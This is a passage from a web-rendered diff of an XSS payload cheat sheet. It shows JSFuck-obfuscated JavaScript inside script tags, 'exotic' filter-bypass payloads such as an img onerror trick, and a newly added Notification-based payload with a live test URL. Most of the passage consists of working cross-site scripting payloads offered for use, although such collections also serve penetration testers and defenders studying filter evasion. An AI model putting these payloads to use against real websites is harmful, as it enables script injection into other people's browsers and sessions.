+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Exotic payloads
|
Exotic payloads
|
||||||
```
|
```
|
||||||
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
|
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
|
||||||
@ -638,6 +655,18 @@ Exotic payloads
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## More fun ?
|
||||||
|
This section will be used for the "fun/interesting/useless" stuff.
|
||||||
|
|
||||||
|
Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)
|
||||||
|
Note : it requires user permission
|
||||||
|
```
|
||||||
|
Notification.requestPermission(x=>{new(Notification)(1)})
|
||||||
|
|
||||||
|
Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
|
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
|
||||||
* tbm
|
* tbm
|
||||||
|
Loading…
Reference in New Issue
Block a user